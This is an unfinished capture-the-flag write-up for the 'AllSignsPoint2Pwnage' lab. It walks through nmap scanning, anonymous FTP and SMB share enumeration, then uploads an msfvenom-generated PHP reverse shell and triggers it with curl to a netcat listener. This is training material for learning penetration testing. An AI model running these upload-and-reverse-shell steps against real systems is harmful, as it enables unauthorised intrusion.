# AllSignsPoint2Pwnage (WIP) ## Nmap ``` sudo nmap 10.10.54.102 -p- -sS -sV -Pn Not shown: 65519 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd 80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.11) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.11) 445/tcp open microsoft-ds? 3389/tcp open ms-wbt-server Microsoft Terminal Services 5040/tcp open unknown 5900/tcp open vnc VNC (protocol 3.8) 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49672/tcp open msrpc Microsoft Windows RPC 49683/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows ``` First up checking FTP shows we can login with anonymous login. From here listing the contents only shows notice.txt. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1cf9d2e3280b1dae6591a562bff796d91c861ebd%2Fimage.png?alt=media) Viewing the contents we become aware of a hidden SMB share called 'images'. The notice also implies uploading is possible on the share. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9a7e70b823495297f8ed2b52ea956c07674c113e%2Fimage.png?alt=media) Checking for shares with smbclient. ``` smbclient -U '' -L \\\\10.10.54.102\\ ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-bf1ba35d0452d70e03ab3a3fd5314153ab6f4ca5%2Fimage.png?alt=media) We can then connect to the images$ share. List the contents and confirmd file upload with the `put` command using test.txt ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c2b365d4ff5c4322ba6fd650ac6b07d248260b5e%2Fimage.png?alt=media) Browsing to port 80 to check out the webserver we are presented with a slideshow. Using the contextual menu to save the images shows us the name of the image which matches that in the SMB share. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-60a368d84cff443573d945d82c4e567ec51f1e25%2Fimage.png?alt=media) We can test if we can read the contents of test.txt to confirm we can execute uploaded files. We can try the /images/ directory as we known the share exists. ``` curl http://10.10.54.102/images/test.txt ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d389543615540367b85a4534adc5b4c406b5e081%2Fimage.png?alt=media) Knowing this works we can start to work towards getting a reverse shell. Checking information regarding the web server using Nikto shows it is powered by PHP. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-32909ecfd586977b5694bf727faaf2c532e3f2ff%2Fimage.png?alt=media) Ideally we should create a PHP reverse shell and upload it to the SMB share. We can achieve this with msfvenom as shown below. ``` msfvenom -p php/reverse_php LHOST=10.14.3.108 LPORT=80 -f raw > phpreverseshell.php ``` Then upload the shell to the SMB share. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-03f83bea97a10334805359db0b5a6fc3a7683f39%2Fimage.png?alt=media) Open a `netcat` listener to the port specified in the payload. ``` sudo nc -lvp 80 ``` Then execute the shell with curl. ``` curl http://10.10.54.102/images/phpreverseshell.php ``` Which connects our listener. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c2b246fcac544d2e8aefe02d21c70b02417f5ca3%2Fimage.png?alt=media)